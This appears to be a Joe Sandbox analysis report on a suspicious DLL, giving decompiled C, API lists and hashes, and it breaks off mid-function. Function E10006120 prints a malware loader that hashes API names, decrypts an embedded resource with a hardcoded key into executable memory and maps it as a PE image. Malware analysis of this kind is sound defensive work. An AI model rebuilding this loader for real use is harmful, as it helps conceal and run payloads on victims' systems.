                                                                        • Opcode Fuzzy Hash: 2a6b980db9533a80bee2071cb613a1de34b70dec757d7447317d0fbaf167c0ba
                                                                        • Instruction Fuzzy Hash: EFF0493200026EEFD711EF95CC88A66B3ACFB85322F40082AE148C2022D734B556CAA4
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Execution Graph

                                                                        Execution Coverage:3.1%
                                                                        Dynamic/Decrypted Code Coverage:0%
                                                                        Signature Coverage:0.4%
                                                                        Total number of Nodes:228
                                                                        Total number of Limit Nodes:24
                                                                        execution_graph 22138 10005090 22139 100050a0 22138->22139 22140 10005099 ExitProcess 22138->22140 22143 10004780 22139->22143 22144 1000495d 22143->22144 22145 10004869 22143->22145 22145->22144 22146 10004c84 bsearch 22145->22146 22147 100049ec malloc 22145->22147 22146->22144 22147->22144 22148 10004b0b 22147->22148 22148->22148 22149 10004b8f qsort 22148->22149 22149->22146 22150 100045d0 VirtualAlloc 22151 100011a0 22154 100350ea 22151->22154 22153 100011aa 22155 100350f4 __EH_prolog 22154->22155 22164 10035766 22155->22164 22159 1003511a 22169 100373b5 30 API calls ctype 22159->22169 22161 10035128 22170 10037855 22161->22170 22165 10035770 __EH_prolog 22164->22165 22181 1003570d 25 API calls 22165->22181 22167 10035102 22167->22159 22168 10011f76 36 API calls 3 library calls 22167->22168 22168->22159 22169->22161 22173 1003785f __EH_prolog 22170->22173 22171 10037895 22195 10037552 EnterCriticalSection 22171->22195 22173->22171 22174 10037884 22173->22174 22182 1003768d TlsAlloc 22173->22182 22185 10037446 EnterCriticalSection 22174->22185 22176 100378a4 22178 100378aa 22176->22178 22179 1003513a GetCurrentThread GetCurrentThreadId 22176->22179 22200 10037732 9 API calls 2 library calls 22178->22200 22179->22153 22181->22167 22183 100376c1 InitializeCriticalSection 22182->22183 22184 100376bc 22182->22184 22183->22174 22184->22183 22190 10037467 22185->22190 22186 1003751c _rand 22189 10037533 LeaveCriticalSection 22186->22189 22187 100374b0 GlobalHandle GlobalUnlock GlobalReAlloc 22191 100374d5 22187->22191 22188 100374a0 GlobalAlloc 22188->22191 22189->22171 22190->22186 22190->22187 22190->22188 22192 100374fc GlobalLock 22191->22192 22193 100374e0 GlobalHandle GlobalLock 22191->22193 22194 100374ee LeaveCriticalSection 22191->22194 22192->22186 22193->22194 22194->22192 22196 10037569 22195->22196 22199 1003757a LeaveCriticalSection 22195->22199 22197 1003756e TlsGetValue 22196->22197 22196->22199 22197->22199 22199->22176 22200->22179 22201 100045f0 VirtualFree 22202 100373a5 22203 10037855 ctype 24 API calls 22202->22203 22204 100373b4 22203->22204 22205 10016dd6 SetUnhandledExceptionFilter 22206 10015f39 22207 10015f46 22206->22207 22212 1001382a 22207->22212 22209 10015f60 22210 1001382a _rand 36 API calls 22209->22210 22211 10015f79 22209->22211 22210->22211 22217 10013836 __getbuf _rand ctype 22212->22217 22213 100138a3 RtlAllocateHeap 22213->22217 22215 100138cf ctype 22215->22209 22217->22213 22217->22215 22219 10013a38 36 API calls __lock 22217->22219 22220 1001437a 5 API calls _rand 22217->22220 22221 100138d4 LeaveCriticalSection __mtdeletelocks 22217->22221 22219->22217 22220->22217 22221->22217 22223 1001131c 22225 10011328 ctype 22223->22225 22224 10011379 22232 100113b6 ctype 22224->22232 22279 10006120 22224->22279 22225->22224 22225->22232 22233 1001119b 22225->22233 22228 1001138d 22229 100113a3 22228->22229 22231 1001119b 107 API calls 22228->22231 22230 1001119b 107 API calls 22229->22230 22229->22232 22230->22232 22231->22229 22234 1001128b 22233->22234 22235 100111ab __lock 22233->22235 22236 100112bb 22234->22236 22237 1001128f 22234->22237 22240 100111b5 GetVersionExA 22235->22240 22238 100112c0 22236->22238 22239 10011304 22236->22239 22243 100112aa 22237->22243 22248 100112b9 22237->22248 22323 10011f67 22237->22323 22241 1001382a _rand 36 API calls 22238->22241 22239->22248 22350 10015355 38 API calls 22239->22350 22242 100111cc 22240->22242 22240->22248 22244 100112cc 22241->22244 22297 10013a83 HeapCreate 22242->22297 22326 1001634a 37 API calls __mtdeletelocks 22243->22326 22244->22248 22249 100112d4 FlsSetValue 22244->22249 22248->22224 22252 100112e6 22249->22252 22253 100112fa 22249->22253 22251 100112af 22327 1001516d FlsFree 22251->22327 22258 100112eb GetCurrentThreadId 22252->22258 22340 100107c8 22253->22340 22254 10011217 22254->22248 22328 10015384 45 API calls _rand 22254->22328 22257 100112b4 22260 10013ad4 VirtualFree VirtualFree HeapFree HeapFree HeapDestroy 22257->22260 22258->22248 22260->22248 22261 10011225 22262 10011229 22261->22262 22264 10011238 GetCommandLineA 22261->22264 22329 10013ad4 22262->22329 22305 1001666b 44 API calls 2 library calls 22264->22305 22265 1001122e 22265->22248 22267 10011248 22306 1001614c 22267->22306 22270 10011284 22339 1001516d FlsFree 22270->22339 22273 1001126f 22273->22265 22338 1001634a 37 API calls __mtdeletelocks 22273->22338 22274 1001125b 22274->22273 22336 10016396 65 API calls 5 library calls 22274->22336 22277 10011264 22277->22273 22337 10011e29 40 API calls 22277->22337 22280 10006566 22279->22280 22281 1000612c 22279->22281 22280->22228 22392 10005040 22281->22392 22283 10006131 22284 1000656f 22283->22284 22287 10006139 22283->22287 22416 10011135 49 API calls ctype 22284->22416 22286 10006579 22286->22228 22288 1000634f FindResourceW LoadResource SizeofResource 22287->22288 22289 10006432 VirtualAlloc 22288->22289 22290 1000638c VirtualAllocExNuma 22288->22290 22291 100064d0 memcpy malloc 22289->22291 22290->22291 22415 10002340 malloc ??3@YAXPAX 22291->22415 22293 10006508 22294 1000651f ??3@YAXPAX 22293->22294 22398 10005260 22294->22398 22296 1000654b 22296->22280 22298 10013aa3 22297->22298 22299 10013acd 22297->22299 22300 10013ad0 22298->22300 22301 10013ab2 22298->22301 22299->22254 22300->22254 22351 10013b53 HeapAlloc 22301->22351 22303 10013abc 22303->22300 22304 10013ac1 HeapDestroy 22303->22304 22304->22299 22305->22267 22352 100107b6 22306->22352 22308 10011252 22308->22270 22335 100165c9 66 API calls 2 library calls 22308->22335 22309 100161a1 GetStartupInfoA 22311 100161bb 22309->22311 22312 100162a4 22309->22312 22311->22312 22316 100107b6 __getbuf 36 API calls 22311->22316 22319 1001622c 22311->22319 22313 100162d3 GetStdHandle 22312->22313 22314 10016334 SetHandleCount 22312->22314 22322 100162f8 22312->22322 22313->22312 22315 100162e1 GetFileType 22313->22315 22314->22308 22315->22312 22316->22311 22317 10016252 GetFileType 22318 1001625d 22317->22318 22317->22319 22318->22308 22318->22319 22355 10019599 GetModuleHandleA GetProcAddress ctype 22318->22355 22319->22312 22319->22317 22319->22318 22322->22308 22322->22312 22356 10019599 GetModuleHandleA GetProcAddress ctype 22322->22356 22374 10011e93 22323->22374 22325 10011f72 22325->22243 22326->22251 22328->22261 22330 10013b46 HeapDestroy 22329->22330 22331 10013add 22329->22331 22330->22265 22332 10013b34 HeapFree 22331->22332 22333 10013b00 VirtualFree VirtualFree HeapFree 22331->22333 22332->22330 22333->22333 22334 10013b32 22333->22334 22334->22332 22335->22274 22336->22277 22337->22273 22338->22270 22343 100107d4 ctype 22340->22343 22341 10010833 ctype 22341->22248 22342 10010810 22342->22341 22344 10010825 RtlFreeHeap 22342->22344 22343->22341 22343->22342 22389 10013a38 36 API calls __lock 22343->22389 22344->22341 22346 100107eb __mtdeletelocks 22349 10010805 22346->22349 22390 10013bc6 VirtualFree VirtualFree HeapFree __shift 22346->22390 22391 1001081b LeaveCriticalSection __mtdeletelocks 22349->22391 22350->22248 22351->22303 22357 1001078a 22352->22357 22355->22318 22356->22322 22359 100107b3 22357->22359 22360 10010791 __getbuf 22357->22360 22359->22308 22359->22309 22360->22359 22361 1001070f 22360->22361 22362 1001071b ctype 22361->22362 22363 1001074e 22362->22363 22371 10013a38 36 API calls __lock 22362->22371 22365 10010769 RtlAllocateHeap 22363->22365 22366 10010778 ctype 22363->22366 22365->22366 22366->22360 22367 10010736 22372 1001437a 5 API calls _rand 22367->22372 22369 10010741 22373 10010781 LeaveCriticalSection __mtdeletelocks 22369->22373 22371->22367 22372->22369 22373->22363 22375 10011e9f ctype 22374->22375 22386 10013a38 36 API calls __lock 22375->22386 22377 10011ea6 22378 10011eb7 GetCurrentProcess TerminateProcess 22377->22378 22379 10011ec7 __lock 22377->22379 22378->22379 22387 10011f42 LeaveCriticalSection __mtdeletelocks 22379->22387 22381 10011f2a 22382 10011f50 ctype 22381->22382 22383 10011f2f 22381->22383 22382->22325 22388 10011dcf GetModuleHandleA GetProcAddress ExitProcess 22383->22388 22386->22377 22387->22381 22389->22346 22390->22349 22391->22342 22393 100107b6 __getbuf 36 API calls 22392->22393 22395 1000504b 22393->22395 22394 10005052 22394->22283 22395->22394 22395->22395 22396 100107c8 __mtdeletelocks 36 API calls 22395->22396 22397 10005077 22396->22397 22397->22283 22400 10005312 22398->22400 22408 1000600e 22398->22408 22399 100056c8 GetNativeSystemInfo 22402 10005753 22399->22402 22400->22399 22400->22408 22401 10005a04 GetProcessHeap HeapAlloc 22403 10005ae8 22401->22403 22404 10005a9d 22401->22404 22402->22401 22402->22408 22405 10005fdb 22403->22405 22407 10005c79 memcpy 22403->22407 22404->22296 22414 1000601b 22405->22414 22426 10004dd0 ??3@YAXPAX ??3@YAXPAX GetProcessHeap HeapFree 22405->22426 22417 10002ca0 memset memcpy 22407->22417 22408->22296 22410 10005e55 22410->22405 22418 10003f40 IsBadReadPtr realloc IsBadReadPtr 22410->22418 22412 10005f8c 22412->22405 22419 10003570 22412->22419 22414->22296 22415->22293 22416->22286 22417->22410 22418->22412 22422 10003644 22419->22422 22420 10003a98 22421 10003310 VirtualProtect 22420->22421 22423 10003aaf 22421->22423 22422->22420 22425 10003ac0 22422->22425 22427 10003310 22422->22427 22423->22405 22425->22405 22426->22408 22428 10003322 22427->22428 22429 1000332b 22427->22429 22428->22422 22430 10003500 VirtualProtect 22429->22430 22431 1000337a 22429->22431 22430->22422 22431->22422

                                                                        Executed Functions

                                                                        Function 10016DD6 Relevance: 1.5, APIs: 1, Instructions: 5COMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 341 10016dd6-10016de8 SetUnhandledExceptionFilter
                                                                        C-Code - Quality: 100%
                                                                        			E10016DD6() {
				_Unknown_base(*)()* _t1;

				_t1 = SetUnhandledExceptionFilter(E10016D88); // executed
				 *0x1004f70c = _t1;
				return 0;
			}




                                                                        0x10016ddb
                                                                        0x10016de1
                                                                        0x10016de8

                                                                        APIs
                                                                        • SetUnhandledExceptionFilter.KERNEL32(Function_00016D88), ref: 10016DDB
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.438224128.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000003.00000002.438218556.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000003.00000002.438269645.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000003.00000002.438284622.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000003.00000002.438290903.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000003.00000002.438363852.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                        Similarity
                                                                        • API ID: ExceptionFilterUnhandled
                                                                        • String ID:
                                                                        • API String ID: 3192549508-0
                                                                        • Opcode ID: 0aa30ca264b0f9a5cf40b7665c776e521371a76379119d2d5b9024e220ba3caa
                                                                        • Instruction ID: 860c8d24a5751d164401ddec1a1de020cdd10d2ad02b80096470b608a28627d3
                                                                        • Opcode Fuzzy Hash: 0aa30ca264b0f9a5cf40b7665c776e521371a76379119d2d5b9024e220ba3caa
                                                                        • Instruction Fuzzy Hash: E0A02471501310CFF300CF715C4C4003F50DF47101301C014D100C7111DF3440405F00
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 10016DEA Relevance: 1.5, APIs: 1, Instructions: 3COMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 342 10016dea-10016df5 SetUnhandledExceptionFilter
                                                                        APIs
                                                                        • SetUnhandledExceptionFilter.KERNEL32 ref: 10016DEF
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.438224128.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000003.00000002.438218556.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000003.00000002.438269645.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000003.00000002.438284622.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000003.00000002.438290903.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000003.00000002.438363852.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                        Similarity
                                                                        • API ID: ExceptionFilterUnhandled
                                                                        • String ID:
                                                                        • API String ID: 3192549508-0
                                                                        • Opcode ID: 866fa5084d223cfbc77dc57b5ae8d892812aabc08f322071eabba0974904f1fe
                                                                        • Instruction ID: f7546913759f097ca14aad0a20f134b0dcb5b1656803b28e894a55764d857528
                                                                        • Opcode Fuzzy Hash: 866fa5084d223cfbc77dc57b5ae8d892812aabc08f322071eabba0974904f1fe
                                                                        • Instruction Fuzzy Hash:
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 10006120 Relevance: 21.3, APIs: 8, Strings: 4, Instructions: 301memoryCOMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        C-Code - Quality: 41%
                                                                        			E10006120(void* __ebx, void* __edi, void* __esi, void* __ebp, struct HINSTANCE__* _a4, signed int _a8) {
				void* _v4;
				void* _t36;
				void* _t39;
				void* _t40;
				intOrPtr _t42;
				intOrPtr _t43;
				intOrPtr _t44;
				intOrPtr _t45;
				intOrPtr _t46;
				intOrPtr _t47;
				intOrPtr _t48;
				intOrPtr _t49;
				intOrPtr _t50;
				intOrPtr _t51;
				intOrPtr _t52;
				intOrPtr _t53;
				intOrPtr _t54;
				intOrPtr _t55;
				intOrPtr _t56;
				intOrPtr _t57;
				intOrPtr _t58;
				intOrPtr _t59;
				intOrPtr _t60;
				intOrPtr _t61;
				intOrPtr _t62;
				intOrPtr _t63;
				intOrPtr _t64;
				struct HRSRC__* _t65;
				signed int _t68;
				signed int _t69;
				void* _t77;
				void* _t79;
				intOrPtr _t83;
				signed int _t85;
				signed int _t96;
				void* _t97;
				signed int _t99;
				signed int _t100;
				signed int _t110;
				signed int _t112;
				signed int _t113;
				long _t117;
				signed int _t119;
				void* _t121;
				struct HRSRC__* _t123;
				int _t124;
				void* _t127;
				struct HINSTANCE__* _t128;
				signed int _t129;
				void* _t133;
				signed int _t138;
				signed int _t149;
				signed int _t152;
				signed int _t157;
				intOrPtr _t182;

				if(_a8 != 1) {
					L6:
					return 1;
				} else {
					_t36 = E10005040(__edi);
					_t181 = _t36;
					if(_t36 != 0) {
						_push(0x1003ce28);
						E10011135(__ebx, __edi, __esi, __eflags);
						__eflags = 0;
						return 0;
					} else {
						_push(__ebx);
						_push(__ebp);
						_push(__esi);
						_push(__edi);
						_push(L"kernel32.dll");
						_push(0x3801a8f2);
						_push(0x1a322e2e);
						_push(0x628ad09);
						_push(0x31c6c0a1);
						_push(0x28b4cee6);
						 *0x1004b0d8 = 0;
						 *0x1004b0dc = 0;
						 *0x1004b0e0 = 0;
						 *0x1004b0e8 = 0;
						 *0x1004b0e4 = 0;
						 *0x1004b0ec = 0;
						 *0x1004b0f0 = 0;
						_t39 = E10001E60(_t181);
						_push(L"ntdll.dll");
						_push(0x1c9cdc39);
						_push(0x2d34cc91);
						_push(0x118db97f);
						_push(0x348b2998);
						_push(0x3446e98c);
						_t127 = _t39;
						_t40 = E10001E60(_t181);
						_push(L"msvcrt.dll");
						_push(0xe094f82);
						_push(0x20e23fe3);
						_push(0x156af904);
						_push(0x108d4cdc);
						_push(0x106d66fc);
						_t121 = E10001E60(_t181);
						_push(0x3ee42795);
						_push(_t121);
						_t42 = E10001FF0();
						_push(0x402c2791);
						_push(_t121);
						 *0x1004d3f0 = _t42;
						_t43 = E10001FF0();
						_push(0xb29018f0);
						_push(_t121);
						 *0x1004d3ec = _t43;
						_t44 = E10001FF0();
						_push(0xccfd283f);
						_push(_t121);
						 *0x1004d3e0 = _t44;
						_t45 = E10001FF0();
						_push(0x298c691d);
						_push(_t121);
						 *0x1004d3d0 = _t45;
						_t46 = E10001FF0();
						_push(0x40ec656b);
						_push(_t121);
						 *0x1004d3e4 = _t46;
						_t47 = E10001FF0();
						_push(0x40946966);
						_push(_t121);
						 *0x1004d3fc = _t47;
						_t48 = E10001FF0();
						_push(0x5496c247);
						_push(_t127);
						 *0x1004d3a8 = _t48;
						_t49 = E10001FF0();
						_push(0x3b465a8a);
						_push(_t127);
						 *0x1004d3ac = _t49;
						_t50 = E10001FF0();
						_push(0x66afc09d);
						_push(_t127);
						 *0x1004d3b8 = _t50;
						_t51 = E10001FF0();
						_push(0x5eb2ba6);
						_push(_t127);
						 *0x1004d3d4 = _t51;
						_t52 = E10001FF0();
						_push(0x3c6bbc0e);
						_push(_t127);
						 *0x1004d3cc = _t52;
						_t53 = E10001FF0();
						_push(0x3f32f2a5);
						_push(_t127);
						 *0x1004d3c8 = _t53;
						_t54 = E10001FF0();
						_push(0x112ecd9a);
						_push(_t127);
						 *0x1004d3d8 = _t54;
						_t55 = E10001FF0();
						_push(0xcfb09550);
						_push(_t127);
						 *0x1004d400 = _t55;
						_t56 = E10001FF0();
						_push(0x30fe1b19);
						_push(_t40);
						 *0x1004d3bc = _t56;
						_t57 = E10001FF0();
						_push(0x33a92211);
						_push(_t127);
						 *0x1004d3b4 = _t57;
						_t58 = E10001FF0();
						_push(0xaab3e2a9);
						_push(_t127);
						 *0x1004d3f8 = _t58;
						_t59 = E10001FF0();
						_push(0x31e84135);
						_push(_t127);
						 *0x1004d3f4 = _t59;
						_t60 = E10001FF0();
						_push(0xaef34aa1);
						_push(_t127);
						 *0x1004d3dc = _t60;
						_t61 = E10001FF0();
						_push(0x1e75927d);
						_push(_t127);
						 *0x1004d3b0 = _t61;
						_t62 = E10001FF0();
						_push(0x56331b6e);
						_push(_t127);
						 *0x1004d3e8 = _t62;
						_t63 = E10001FF0();
						_push(0x1cf8ffb);
						_push(_t127);
						 *0x1004d3c4 = _t63;
						_t64 = E10001FF0();
						_t128 = _a4;
						 *0x1004d3c0 = _t64; // executed
						_t65 = FindResourceW(_t128, 0x5f4c, 0x1003ce4c); // executed
						_t123 = _t65;
						_v4 = LoadResource(_t128, _t123);
						_t124 = SizeofResource(_t128, _t123);
						_t182 =  *0x1004d3b8; // 0x76d866e0
						if(_t182 == 0) {
							_t96 =  *0x1004b0e8; // 0x0
							_t113 =  *0x1004b0e0; // 0x0
							_t68 =  *0x1004b0d8; // 0x0
							_t129 =  *0x1004b0dc; // 0x0
							_t149 =  *0x1004b0ec; // 0x0
							_t69 =  *0x1004b0e4; // 0x0
							_t15 = _t113 * 2; // 0x3
							_t152 = _t149 * _t68 + ((_t96 * _t113 + _t68) * 0x3fffffff + _t129) * _t96 + _t113 + _t129;
							_a8 = _t152;
							_t110 = (_t129 + _t15 + 3) * _t69 << 2;
							_t20 = _t96 + 2; // 0x2
							_t157 =  *0x1004b0d8; // 0x0
							_t117 = _t69 - _t20 * _t129 - _t113 * _t157 + (_t69 - _t20 * _t129 - _t113 * _t157) * 0x00000002 + (_t69 * _t96 * _t157 + _t69 * _t96 * _t157 * 0x00000002 - 0x00000003) *  *0x1004b0ec + 0x00002000 | 0x00001000 + _a8 * 0x00000004 - _t110;
							__eflags = _t117;
							_t77 = VirtualAlloc(0, _t124, _t117, 0x40 + _t152 * 4 - _t110);
						} else {
							_t112 =  *0x1004b0e8; // 0x0
							_t119 =  *0x1004b0dc; // 0x0
							_t85 =  *0x1004b0ec; // 0x0
							_t99 =  *0x1004b0d8; // 0x0
							_t4 = _t99 + 0x3fffffff; // 0x3fffffff
							_t138 =  *0x1004b0e0; // 0x0
							_t8 = _t138 * 2; // 0x3
							_t100 =  *0x1004b0e0; // 0x0
							_t77 =  *0x1004d3b8(0xffffffff, 0, _t124, 0x00001000 + (_t85 * _t99 + ((_t112 * _t138 + _t99) * 0x3fffffff + _t119) * _t112 - (_t119 + _t8 + 0x00000003) *  *0x1004b0e4 + _t100 + _t119) * 0x00000004 | _t85 *  *0x1004b0e4 * _t112 * _t112 * _t112 * _t112 * _t112 + _t119 + _t85 *  *0x1004b0e4 * _t112 * _t112 * _t112 * _t112 * _t112 + _t119 + 0x00002000, 0x40 + (_t112 * 0x3fffffff + _t4 * _t119 + _t85 + _t138) * 4, 0); // executed
						}
						_t133 = _t77;
						memcpy(_t133, _v4, _t124);
						_t79 = malloc(0x9d1);
						_t97 = _t79;
						E10002340();
						E100027D0();
						 *0x1004d3e0(_t97, 0x39fc4527, 0xfc9810f7, 0x2aab42ff, _t97, _t133, _t124, 0xed9e0cf, 0x96c3a441, 0x245e78a3, _t97, "8nGA7ohfFpugG(l$!#2u__*t5EaFD77", 0x20);
						_t83 = E10005260();
						 *0x1004d408 = _t83;
						 *0x1004d404(_a4, 1, 0, _t133, _t124, E100045D0, E100045F0, E10004610, E10004650, E10004670, 0);
						goto L6;
					}
				}
			}


























































                                                                        0x10006126
                                                                        0x10006566
                                                                        0x1000656c
                                                                        0x1000612c
                                                                        0x1000612c
                                                                        0x10006131
                                                                        0x10006133
                                                                        0x1000656f
                                                                        0x10006574
                                                                        0x1000657c
                                                                        0x1000657f
                                                                        0x10006139
                                                                        0x10006139
                                                                        0x1000613a
                                                                        0x1000613b
                                                                        0x1000613c
                                                                        0x1000613d
                                                                        0x10006142
                                                                        0x10006147
                                                                        0x1000614e
                                                                        0x10006153
                                                                        0x10006158
                                                                        0x1000615d
                                                                        0x10006163
                                                                        0x10006169
                                                                        0x1000616f
                                                                        0x10006175
                                                                        0x1000617b
                                                                        0x10006181
                                                                        0x10006187
                                                                        0x1000618c
                                                                        0x10006191
                                                                        0x10006196
                                                                        0x1000619b
                                                                        0x100061a0
                                                                        0x100061a5
                                                                        0x100061aa
                                                                        0x100061ac
                                                                        0x100061b1
                                                                        0x100061b6
                                                                        0x100061bb
                                                                        0x100061c0
                                                                        0x100061c5
                                                                        0x100061ca
                                                                        0x100061d9
                                                                        0x100061db
                                                                        0x100061e0
                                                                        0x100061e1
                                                                        0x100061e6
                                                                        0x100061eb
                                                                        0x100061ec
                                                                        0x100061f1
                                                                        0x100061f6
                                                                        0x100061fb
                                                                        0x100061fc
                                                                        0x10006201
                                                                        0x10006206
                                                                        0x1000620b
                                                                        0x1000620c
                                                                        0x10006211
                                                                        0x10006216
                                                                        0x1000621b
                                                                        0x1000621c
                                                                        0x10006221
                                                                        0x10006226
                                                                        0x1000622b
                                                                        0x1000622c
                                                                        0x10006231
                                                                        0x10006236
                                                                        0x1000623b
                                                                        0x1000623c
                                                                        0x10006241
                                                                        0x10006246
                                                                        0x1000624b
                                                                        0x1000624c
                                                                        0x10006251
                                                                        0x10006259
                                                                        0x1000625e
                                                                        0x1000625f
                                                                        0x10006264
                                                                        0x10006269
                                                                        0x1000626e
                                                                        0x1000626f
                                                                        0x10006274
                                                                        0x10006279
                                                                        0x1000627e
                                                                        0x1000627f
                                                                        0x10006284
                                                                        0x10006289
                                                                        0x1000628e
                                                                        0x1000628f
                                                                        0x10006294
                                                                        0x10006299
                                                                        0x1000629e
                                                                        0x1000629f
                                                                        0x100062a4
                                                                        0x100062a9
                                                                        0x100062ae
                                                                        0x100062af
                                                                        0x100062b4
                                                                        0x100062b9
                                                                        0x100062be
                                                                        0x100062bf
                                                                        0x100062c4
                                                                        0x100062c9
                                                                        0x100062ce
                                                                        0x100062cf
                                                                        0x100062d4
                                                                        0x100062dc
                                                                        0x100062e1
                                                                        0x100062e2
                                                                        0x100062e7
                                                                        0x100062ec
                                                                        0x100062f1
                                                                        0x100062f2
                                                                        0x100062f7
                                                                        0x100062fc
                                                                        0x10006301
                                                                        0x10006302
                                                                        0x10006307
                                                                        0x1000630c
                                                                        0x10006311
                                                                        0x10006312
                                                                        0x10006317
                                                                        0x1000631c
                                                                        0x10006321
                                                                        0x10006322
                                                                        0x10006327
                                                                        0x1000632e
                                                                        0x10006333
                                                                        0x10006334
                                                                        0x1000633a
                                                                        0x1000633f
                                                                        0x10006344
                                                                        0x10006345
                                                                        0x1000634a
                                                                        0x1000634f
                                                                        0x10006361
                                                                        0x10006366
                                                                        0x10006368
                                                                        0x10006374
                                                                        0x1000637e
                                                                        0x10006380
                                                                        0x10006386
                                                                        0x10006432
                                                                        0x10006438
                                                                        0x1000643e
                                                                        0x10006443
                                                                        0x10006449
                                                                        0x10006459
                                                                        0x1000646d
                                                                        0x10006474
                                                                        0x10006476
                                                                        0x10006481
                                                                        0x10006487
                                                                        0x10006494
                                                                        0x100064c4
                                                                        0x100064c4
                                                                        0x100064ca
                                                                        0x1000638c
                                                                        0x1000638c
                                                                        0x10006392
                                                                        0x10006398
                                                                        0x1000639e
                                                                        0x100063a4
                                                                        0x100063b9
                                                                        0x100063d6
                                                                        0x100063fa
                                                                        0x10006427
                                                                        0x10006427
                                                                        0x100064d5
                                                                        0x100064d9
                                                                        0x100064e4
                                                                        0x100064f1
                                                                        0x10006503
                                                                        0x1000651a
                                                                        0x10006523
                                                                        0x10006546
                                                                        0x10006557
                                                                        0x1000655c
                                                                        0x00000000
                                                                        0x10006565
                                                                        0x10006133

                                                                        APIs
                                                                        • FindResourceW.KERNEL32(?,00005F4C,1003CE4C), ref: 10006366
                                                                        • LoadResource.KERNEL32(?,00000000), ref: 1000636C
                                                                        • SizeofResource.KERNEL32(?,00000000), ref: 10006378
                                                                        • VirtualAllocExNuma.KERNEL32(000000FF,00000000,00000000,00000000,00000000,00000000), ref: 10006427
                                                                        • VirtualAlloc.KERNEL32(00000000,00000000,?,00000000), ref: 100064CA
                                                                        • memcpy.MSVCRT ref: 100064D9
                                                                        • malloc.MSVCRT ref: 100064E4
                                                                        • ??3@YAXPAX@Z.MSVCRT ref: 10006523
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.438224128.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000003.00000002.438218556.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000003.00000002.438269645.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000003.00000002.438284622.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000003.00000002.438290903.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000003.00000002.438363852.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                        Similarity
                                                                        • API ID: Resource$AllocVirtual$??3@FindLoadNumaSizeofmallocmemcpy
                                                                        • String ID: 8nGA7ohfFpugG(l$!#2u__*t5EaFD77$kernel32.dll$msvcrt.dll$ntdll.dll
                                                                        • API String ID: 3024364686-882265788
                                                                        • Opcode ID: 73f28b8c6d58252cdff927fcb48cb9a981f06cd2f682e57dd75e91a0e94e53b4
                                                                        • Instruction ID: 1699d20feb2015e992388abaa39e01a506b89f8495deb80be789641e5ebed42c
                                                                        • Opcode Fuzzy Hash: 73f28b8c6d58252cdff927fcb48cb9a981f06cd2f682e57dd75e91a0e94e53b4
                                                                        • Instruction Fuzzy Hash: ACA159719403256FF704EF748EC6E96769CEB46681B00453FF511E726AEBB0B5008B9D
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 10037446 Relevance: 15.1, APIs: 10, Instructions: 99memoryCOMMONLIBRARYCODE
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        C-Code - Quality: 83%
                                                                        			E10037446(signed char* __ecx) {
				struct _CRITICAL_SECTION* _v8;
				void* _v12;
				char _v32;
				char _v40;
				char _v48;
				signed int __edi;
				void* __esi;
				struct _CRITICAL_SECTION* _t42;
				intOrPtr _t43;
				void* _t44;
				void* _t45;
				void* _t49;
				void* _t50;
				signed int _t71;
				signed char* _t73;
				signed int _t82;
				signed char* _t85;
				void* _t87;
				void* _t89;
				void* _t91;
				void* _t92;
				void* _t94;

				_t73 = __ecx;
				_t89 = _t94;
				_push(__ecx);
				_push(__ecx);
				_t85 = __ecx;
				_t1 = _t85 + 0x1c; // 0x1004f010
				_t42 = _t1;
				_v8 = _t42;
				EnterCriticalSection(_t42);
				_t3 = _t85 + 4; // 0x20
				_t43 =  *_t3;
				_t4 = _t85 + 8; // 0x3
				if( *_t4 >= _t43) {
					L6:
					_t82 = 1;
					if(_t43 <= 1) {
						L11:
						_t20 = _t43 + 0x20; // 0x40
						_t71 = _t20;
						_t21 = _t85 + 0x10; // 0x3192628
						_t44 =  *_t21;
						if(_t44 != 0) {
							_t45 = GlobalHandle(_t44);
							_v12 = _t45;
							GlobalUnlock(_t45);
							_t49 = GlobalReAlloc(_v12, _t71 << 3, 0x2002);
						} else {
